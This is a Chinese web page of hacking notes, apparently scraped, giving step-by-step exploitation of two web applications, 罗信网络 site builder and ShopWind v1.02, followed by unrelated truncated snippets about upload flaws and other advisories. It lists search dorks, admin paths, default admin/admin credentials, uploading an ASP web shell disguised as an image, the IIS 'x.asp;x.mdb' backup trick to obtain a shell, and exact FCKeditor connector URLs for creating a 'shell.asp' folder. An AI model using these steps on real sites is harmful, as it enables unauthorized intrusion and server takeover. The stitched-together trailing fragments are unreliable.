时间:2021-05-23
罗信网络建站系统oDAY
百度 or google "技术支持:罗信网络"
后台地址: site+lx
数据库地址: site+lx+databases+主域名.asp(需要猜测)
帐号&密码: admin admin
下来就是拿shell
重要部分: 上传jpg格式的asp马
数据库备份,请注意,这里只能备份后缀为mdb格式的.
那我们怎么备份呢?
还记得之前x.asp;x.jpg格式吗?
对 我们依靠这个 备份格式为: x.asp;x.mdb
OK之后访问我们的备份shell
在线编辑器: site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释:官方未修补
====================YD分界线====================
ShopWind网店系统 v1.02 上传漏洞
Author:Lan3a
这个程序用的是FCKeditor 编辑器
利用2003的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
文件上传漏洞。文件上传漏洞是Web应用系统中一种常见的漏洞类型,是指网络攻击者上传了一个可执行的文件到服务器并执行,这里上传的文件可以是照片、木马、病毒和Web
网站风险评估。校内所有网站在上线前,必须通过扫描系统进行合规性与安全性检查,包括但不限于系统漏洞、中间件漏洞、Web漏洞、端口与弱口令扫描等。安全管理员通过漏洞
及时发现并修复各类系统自身漏洞。密切关注网站服务器操作系统、应用程序、数据库系统服务商及国家有关安全漏洞通报平台发布的漏洞信息,及时对与本网站有关的漏洞进行修复
发布日期:2011-06.19发布作者:佚名影响版本:PJBlog3V3.2.8.352漏洞类型:设计错误漏洞描述:PJBlog一套开源免费的中文个人博客系统程
刚从官方下载的最新版:F2blog-v1.2_build_03.01_full存在漏洞文件:xmlrpc.php,影响:可上传任意文件到服务器。原理:get_h